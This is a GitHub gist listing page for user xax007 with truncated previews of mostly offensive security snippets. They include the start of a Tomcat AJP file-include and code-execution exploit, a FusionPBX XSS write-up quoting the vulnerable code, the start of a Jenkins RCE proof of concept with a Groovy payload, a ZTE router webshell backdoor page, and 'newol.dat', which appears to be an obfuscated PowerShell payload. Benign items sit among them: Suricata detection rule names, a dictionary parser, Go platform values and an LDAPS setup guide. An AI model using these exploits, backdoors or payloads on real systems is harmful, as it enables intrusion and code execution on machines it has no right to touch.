Skip to content

Instantly share code, notes, and snippets.

xax007

  • Error: Unable to resolve
Block or report user

Report or block xax007

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@xax007
xax007 / tomcat-ajp-lfi.py
Created Feb 23, 2020
Aapche Tomcat AJP local file include and code execution exploit
View tomcat-ajp-lfi.py
#!/usr/bin/env python
#Tomcat-Ajp lfi
import struct
# Some references:
# [url]https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html[/url]
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
@xax007
xax007 / FusionPBX-XSS.md
Last active Nov 29, 2019
FusionPBX-XSS
View FusionPBX-XSS.md
@xax007
xax007 / FusionPBX-XSS.md
Last active Nov 20, 2019
FusionPBX XSS
View FusionPBX-XSS.md

XSS 1

Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

...
    if (strlen(check_str($_GET['redirect'])) > 0) {
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
    }
...
@xax007
xax007 / Suricata_Rules_Descriptionaa
Created Jun 3, 2019
Suricata_Rules_Descriptionaa
View Suricata_Rules_Descriptionaa
SURICATA Applayer Mismatch protocol both directions
SURICATA Applayer Wrong direction first Data
SURICATA Applayer Detect protocol only one direction
SURICATA Applayer Protocol detection skipped
SURICATA Applayer No TLS after STARTTLS
SURICATA Applayer Unexpected protocol
ET CNC Shadowserver Reported CnC Server Port 80 Group 1
ET CNC Shadowserver Reported CnC Server Port 81 Group 1
ET CNC Shadowserver Reported CnC Server Port 443 Group 1
@xax007
xax007 / 0dedict.py
Created May 5, 2019 — forked from josephg/0dedict.py
Apple dictionaries
View 0dedict.py
# Thanks to commenters for providing the base of this much nicer implementation!
# Save and run with $ python 0dedict.py
# You may need to hunt down the dictionary files yourself and change the awful path string below.
# This works for me on MacOS 10.14 Mohave
from struct import unpack
from zlib import decompress
import re
filename = '/System/Library/Assets/com_apple_MobileAsset_DictionaryServices_dictionaryOSX/9f5862030e8f00af171924ebbc23ebfd6e91af78.asset/AssetData/Oxford Dictionary of English.dictionary/Contents/Resources/Body.data'
f = open(filename, 'rb')
View newol.dat
This file has been truncated, but you can view the full file.
$epGjM = [Char[ ] ]"))93]rAhc[]GNiRtS[,'tprT'(ECalPer.)63]rAhc[]GNiRtS[,)55]rAhc[+18]rAhc[+411]rAhc[+28]rAhc[+211]rAhc[((ECalPer.)'|',)77]rAhc[+79]rAhc[+94]rAhc[+38]rAhc[+15]rAhc[((ECalPer.)43]rAhc[]GNiRtS[,'VMbWd'(ECalPer.)'
@xax007
xax007 / go-os-arch.md
Created Apr 11, 2019 — forked from asukakenji/go-os-arch.md
Go (Golang) GOOS and GOARCH
View go-os-arch.md

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.8.3 darwin/amd64.

A list of valid GOOS values

(Bold = supported by go out of the box, ie. without the help of a C compiler, etc.)

  • android
  • darwin
@xax007
xax007 / README.md
Created Mar 16, 2019 — forked from Tom4t0/README.md
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.
View README.md

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default Microsoft active directory servers will offer LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

View CVE-2019-1003000-Jenkins-RCE-POC.py
import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
@xax007
xax007 / web_shell_cmd.gch
Created Nov 30, 2018
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
View web_shell_cmd.gch
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F460 Webshell
</title>
You can’t perform that action at this time.